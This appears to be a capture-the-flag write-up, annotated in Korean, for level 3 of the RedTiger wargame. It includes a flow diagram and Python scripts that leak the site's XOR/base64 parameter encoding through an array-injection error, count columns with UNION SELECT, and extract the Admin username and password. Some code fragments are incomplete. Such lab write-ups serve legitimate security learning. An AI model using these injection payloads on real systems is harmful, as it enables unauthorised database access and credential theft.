[redtiger] level3

digraph G {

        "client" -> step0 -> step2 -> step4 -> step6 -> step8 -> step10 -> step12;

        "server" -> step1 -> step3 -> step5 -> step7 -> step9 -> step11 -> step13;
    step0 -> step1[label="post_data: {usr[]=}",arrowhead="normal"];
    step3 -> step2[label="Error Page",arrowhead="normal"];
    step4 -> step5[label="post_data: {usr=' union select %s from level3_users-- }",arrowhead="normal"];
    step7 -> step6[label="Column Length",arrowhead="normal"];
    step8 -> step9[label="post_data: {usr=' union select 1,2,3,username,password,6,7 from level3_users where username='Admin' -- }",arrowhead="normal"];
    step11 -> step10[label="Data Extract",arrowhead="normal"];

server -> DB 예측

  • 테이블명: level3_users
  • GET 파라미터: usr
SELECT * FROM tb_name where

Array Injection

  • 배열 삽입
import requests


url = "https://redtiger.labs.overthewire.org/level3.php"
cookies = {

# []
payload = {
    "usr[]": ""

r = requests.post(url, cookies=cookies, params=payload, verify=False)

print r.content
  • 삽입시 에러 페이지
Warning: preg_match() expects parameter 2 to be string,
array given in /var/www/hackit/urlcrypt.inc on line 21


    function encrypt($str)
        $cryptedstr = "";
        for ($i =0; $i < strlen($str); $i++)
            $temp = ord(substr($str,$i,1)) ^ 192;

                $temp = "0".$temp;
            $cryptedstr .= $temp. "";
        return base64_encode($cryptedstr);

    function decrypt ($str)
            $str = base64_decode($str);
            if ($str != "" && $str != null && $str != false)
                $decStr = "";

                for ($i=0; $i < strlen($str); $i+=3)
                    $array[$i/3] = substr($str,$i,3);

                foreach($array as $s)
                    $a = $s^192;
                    $decStr .= chr($a);

                return $decStr;
            return false;
        return false;

import base64

def encrypt(_str):
    cryptedstr = ""
    for i in range(len(_str)):
        temp = ord(_str[i:i+1]) ^ 192
        temp = str(temp)
        while len(temp)<3:
            temp = "0" + temp
        cryptedstr += temp

    return base64.b64encode(cryptedstr)

union select

  • 컬럼 개수 확인
import requests
import base64


def encrypt(_str):
    cryptedstr = ""
    for i in range(len(_str)):
        temp = ord(_str[i:i+1]) ^ 192
        temp = str(temp)
        while len(temp)<3:
            temp = "0" + temp
        cryptedstr += temp

    return base64.b64encode(cryptedstr)

url = "https://redtiger.labs.overthewire.org/level3.php"
cookies = {

n = 0
bef_ret = ''
for l in range(20):
    params = {
        "usr": encrypt("' union select %s from level3_users-- " % str(n))
    print "' union select %s from level3_users-- " % str(n)
    n = str(n) + "," + str(l+1)
    r = requests.post(url, cookies=cookies, params=params, verify=False)
    if bef_ret!=r.content and bef_ret!='':
        print r.content

    bef_ret = r.content

union select

  • 데이터 추출
import requests
import base64


def encrypt(_str):
    cryptedstr = ""
    for i in range(len(_str)):
        temp = ord(_str[i:i+1]) ^ 192
        temp = str(temp)
        while len(temp)<3:
            temp = "0" + temp
        cryptedstr += temp

    return base64.b64encode(cryptedstr)

url = "https://redtiger.labs.overthewire.org/level3.php"
cookies = {

params = {
    "usr": encrypt("' union select 1,2,3,username,password,6,7 from level3_users where username='Admin' -- ")

r = requests.post(url, cookies=cookies, params=params, verify=False)
print r.content